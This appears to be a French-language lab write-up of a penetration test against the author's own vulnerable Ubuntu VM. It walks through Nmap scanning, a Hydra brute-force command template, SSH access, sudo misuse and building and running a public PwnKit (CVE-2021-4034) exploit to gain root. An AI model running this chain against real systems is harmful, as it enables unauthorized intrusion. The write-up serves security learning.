
Workflow complet de test d'intrusion : brute force de mots de passe, accès SSH et escalade de privilèges (CVE-2021-4034)
Workflow complet de test d'intrusion : force brute sur les identifiants, accès SSH et escalade de privilèges (CVE-2021-4034)
APERÇU
Ce projet démontre un workflow complet de test d'intrusion contre une machine virtuelle Ubuntu vulnérable. La chaîne d'attaque comprend la reconnaissance, le forçage brutal d'identifiants, l'accès initial et l'escalade de privilèges à l'aide de plusieurs techniques.
OUTILS UTILISÉS
Nmap Hydra SSH Git CVE-2021-4034 (PwnKit)
RECONNAISSANCE
La reconnaissance a été menée à l'aide de Nmap qui a révélé le nombre d'hôtes ouverts dans le réseau spécifique (wifi).
nmap < IP du réseau 0/24 > : Ceci a révélé le nombre d'hôtes actifs et leur adresse MAC.

Comme observé, la VM fonctionnait dans ORACLE VIRTUAL BOX, nous avons pu déterminer qu'il s'agissait de notre VM vulnérable et l'IP suivante.
Un scan supplémentaire a révélé des ports ouverts vulnérables pour l'attaque.
EXPLOIT PRINCIPAL
En utilisant cela, j'ai tenté une attaque de force brute sur les identifiants avec succès à l'aide de Hydra hydra -l < USERNAME > or -L < File.txt > -p < PASSWORD > or -P < File.txt > < TARGET IP > < PORT >
Cette exploitation réussie du mot de passe nous a permis d'utiliser les identifiants pour l'exploitation du port SSH également.
ssh < USERNAME@TARGET IP > Password < exploit password >
Cela nous a donné l'accès initial à notre système victime. De plus, la mauvaise configuration de sudo nous a donné un accès complet à root sudo -l : (ALL : ALL) ALL
sudo su a été l'escalade
EXPLOIT SECONDAIRE
Nous avons continué à exploiter le système victime à l'aide de "Pwnkit CVE-2021-4034".
PwnKit (CVE-2021-4034) est une vulnérabilité de sécurité critique découverte début 2022 par l'équipe de recherche Qualys, affectant le framework Polkit sur les systèmes Linux. Il s'agit d'une faille d'escalade de privilèges locale (LPE) qui permet à tout utilisateur standard non privilégié d'obtenir les privilèges root complets (accès administratif) sur un système. La vulnérabilité existe depuis l'introduction de Polkit en 2009 et est considérée comme "triviale" à exploiter, ce qui la rend très dangereuse.
Common Vulnerabilities and Exposures (CVE) est une liste standardisée et publiquement divulguée de vulnérabilités et d'expositions de cybersécurité dans les logiciels et le matériel.
INSTALLATION DE CVE-2021-4034 ET EXPLOITATION DE LA VM
Tout d'abord, j'ai confirmé que le système cible était potentiellement vulnérable en vérifiant la présence et les permissions de pkexec : which pkexec output: ls -la /usr/bin/pkexec Le binaire avait le bit SUID défini, indiquant qu'il s'exécute avec les privilèges root, ce qui en fait une cible viable pour l'exploitation.
Préparer l'environnement
Pour compiler l'exploit, les outils nécessaires ont été installés : sudo apt update sudo apt install git build-essential -y Cela a garanti que le système dispose du compilateur et des dépendances nécessaires. Si l'apt du système a des tâches en arrière-plan en cours d'exécution, tuez-la.
Transférer / Obtenir le code de l'exploit
L'exploit a été cloné directement sur la machine victime :
cd /tmp
git clone https://github.com/berdav/CVE-2021-4034.git
cd CVE-2021-4034
L'utilisation de /tmp évite l'encombrement et reflète un comportement réaliste d'attaquant.

Compiler l'exploit
L'exploit a été compilé à l'aide de : "make"
Cela a généré l'exécutable nécessaire pour déclencher la vulnérabilité.
Exécuter l'exploit
L'exploit a été exécuté : ./cve-2021-4034
Vérifier l'escalade de privilèges
Après exécution, l'accès root a été confirmé : whoami
Output: root
Cet exploit fonctionne car pkexec gère incorrectement les variables d'environnement, permettant aux attaquants d'exécuter du code arbitraire avec des privilèges élevés.
CONCLUSION
Cet exercice démontre comment un utilisateur apparemment peu privilégié peut escalader vers un contrôle complet du système en exploitant une vulnérabilité connue comme PwnKit (CVE-2021-4034). En combinant l'accès initial via un compromis d'identifiants avec une énumération et une exploitation systématiques, il a été possible d'atteindre l'accès root sans se fier uniquement aux mauvaises configurations. Cela souligne l'importance critique d'une gestion rapide des correctifs et de pratiques de configuration sécurisées. Même une seule vulnérabilité négligée peut conduire à un compromis complet du système, mettant en évidence la nécessité d'évaluations de sécurité continues et de stratégies de défense en profondeur.